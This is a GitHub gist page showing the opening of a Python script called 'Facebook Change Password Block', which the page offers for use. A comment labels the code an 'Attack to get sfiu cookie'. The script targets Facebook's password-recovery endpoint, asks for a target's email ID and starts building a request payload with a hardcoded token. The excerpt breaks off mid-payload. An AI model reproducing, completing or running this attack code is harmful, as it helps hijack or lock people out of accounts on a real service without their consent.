Skip to content

Instantly share code, notes, and snippets.

View Getmrahul's full-sized avatar
🎯
Focusing

Rahul M Getmrahul

🎯
Focusing
View GitHub Profile
@Getmrahul
Getmrahul / harenablock
Last active February 15, 2017 23:14
Facebook Change Password Block
#! usr/bin/python
# -*- coding: utf-8 -*-
import requests
######################### Attack to get sfiu cookie ######################
url = 'https://touch.facebook.com/login/identify/?ctx=recover&ref=wizard'
phno = raw_input('Enter EmailId:\n>')
payload = {
'lsd' : 'AVqoLCeF',